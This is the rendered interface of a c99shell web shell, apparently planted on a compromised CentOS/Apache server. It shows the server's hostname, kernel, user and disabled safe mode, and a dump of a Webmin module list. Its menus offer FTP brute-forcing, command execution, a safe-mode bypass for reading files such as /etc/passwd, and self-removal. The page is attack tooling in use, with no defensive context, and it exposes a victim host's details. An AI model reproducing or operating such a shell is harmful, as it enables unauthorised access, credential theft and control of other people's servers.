!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/etc/webmin/   drwxr-xr-x
Free 52.28 GB of 127.8 GB (40.91%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     installed.cache (1.17 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
array(113) {
  ["change-user"]=>
  string(1) "1"
  ["file"]=>
  string(1) "1"
  ["qmailadmin"]=>
  string(1) "0"
  ["htaccess-htpasswd"]=>
  string(1) "1"
  ["init"]=>
  string(1) "1"
  ["inetd"]=>
  string(1) "0"
  ["cluster-passwd"]=>
  string(1) "1"
  ["raid"]=>
  string(1) "1"
  ["system-status"]=>
  string(1) "1"
  ["sentry"]=>
  string(1) "0"
  ["webminlog"]=>
  string(1) "1"
  ["burner"]=>
  string(1) "1"
  ["webmin"]=>
  string(1) "1"
  ["acl"]=>
  string(1) "1"
  ["mount"]=>
  string(1) "1"
  ["cluster-usermin"]=>
  string(1) "1"
  ["cluster-shell"]=>
  string(1) "1"
  ["fdisk"]=>
  string(1) "1"
  ["fetchmail"]=>
  string(1) "1"
  ["webmincron"]=>
  string(1) "1"
  ["pserver"]=>
  string(1) "0"
  ["samba"]=>
  string(1) "0"
  ["ldap-useradmin"]=>
  string(1) "1"
  ["grub"]=>
  string(1) "1"
  ["ldap-server"]=>
  string(1) "0"
  ["time"]=>
  string(1) "1"
  ["inittab"]=>
  string(1) "1"
  ["custom"]=>
  string(1) "1"
  ["squid"]=>
  string(1) "0"
  ["shorewall"]=>
  string(1) "0"
  ["exports"]=>
  string(1) "1"
  ["vgetty"]=>
  string(1) "0"
  ["package-updates"]=>
  string(1) "1"
  ["pap"]=>
  string(1) "1"
  ["filter"]=>
  string(1) "1"
  ["sarg"]=>
  string(1) "0"
  ["passwd"]=>
  string(1) "1"
  ["bandwidth"]=>
  string(1) "1"
  ["cron"]=>
  string(1) "1"
  ["man"]=>
  string(1) "1"
  ["tunnel"]=>
  string(1) "1"
  ["pptp-server"]=>
  string(1) "0"
  ["cluster-copy"]=>
  string(1) "1"
  ["heartbeat"]=>
  string(1) "0"
  ["sshd"]=>
  string(1) "1"
  ["cluster-cron"]=>
  string(1) "1"
  ["bacula-backup"]=>
  string(1) "0"
  ["cpan"]=>
  string(1) "1"
  ["cfengine"]=>
  string(1) "0"
  ["net"]=>
  string(1) "1"
  ["backup-config"]=>
  string(1) "1"
  ["xinetd"]=>
  string(1) "0"
  ["postfix"]=>
  string(1) "0"
  ["proc"]=>
  string(1) "1"
  ["tcpwrappers"]=>
  string(1) "1"
  ["mailcap"]=>
  string(1) "1"
  ["lvm"]=>
  string(1) "1"
  ["apache"]=>
  string(1) "1"
  ["procmail"]=>
  string(1) "1"
  ["sendmail"]=>
  string(1) "1"
  ["cluster-software"]=>
  string(1) "1"
  ["mailboxes"]=>
  string(1) "1"
  ["openslp"]=>
  string(1) "0"
  ["frox"]=>
  string(1) "0"
  ["smart-status"]=>
  string(1) "1"
  ["pptp-client"]=>
  string(1) "0"
  ["fsdump"]=>
  string(1) "1"
  ["usermin"]=>
  string(1) "0"
  ["pam"]=>
  string(1) "1"
  ["firewall"]=>
  string(1) "1"
  ["majordomo"]=>
  string(1) "0"
  ["lilo"]=>
  string(1) "0"
  ["quota"]=>
  string(1) "1"
  ["cluster-useradmin"]=>
  string(1) "1"
  ["updown"]=>
  string(1) "1"
  ["stunnel"]=>
  string(1) "1"
  ["status"]=>
  string(1) "1"
  ["ppp-client"]=>
  string(1) "1"
  ["wuftpd"]=>
  string(1) "0"
  ["proftpd"]=>
  string(1) "0"
  ["spam"]=>
  string(1) "0"
  ["nis"]=>
  string(1) "1"
  ["at"]=>
  string(1) "1"
  ["lpadmin"]=>
  string(1) "1"
  ["mon"]=>
  string(1) "0"
  ["shell"]=>
  string(1) "1"
  ["dovecot"]=>
  string(1) "0"
  ["postgresql"]=>
  string(1) "0"
  ["krb5"]=>
  string(1) "1"
  ["useradmin"]=>
  string(1) "1"
  ["phpini"]=>
  string(1) "1"
  ["syslog-ng"]=>
  string(1) "0"
  ["ipsec"]=>
  string(1) "0"
  ["logrotate"]=>
  string(1) "1"
  ["ldap-client"]=>
  string(1) "1"
  ["software"]=>
  string(1) "1"
  ["mysql"]=>
  string(1) "1"
  ["dhcpd"]=>
  string(1) "0"
  ["adsl-client"]=>
  string(1) "1"
  ["exim"]=>
  string(1) "0"
  ["telnet"]=>
  string(1) "1"
  ["cluster-webmin"]=>
  string(1) "1"
  ["syslog"]=>
  string(1) "1"
  ["jabber"]=>
  string(1) "0"
  ["servers"]=>
  string(1) "1"
  ["webalizer"]=>
  string(1) "0"
  ["bind8"]=>
  string(1) "0"
  ["idmapd"]=>
  string(1) "1"
  ["shorewall6"]=>
  string(1) "0"
  ["ajaxterm"]=>
  string(1) "1"
  ["iscsi-server"]=>
  string(1) "0"
  ["iscsi-target"]=>
  string(1) "0"
  ["iscsi-client"]=>
  string(1) "0"
}

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0057 ]--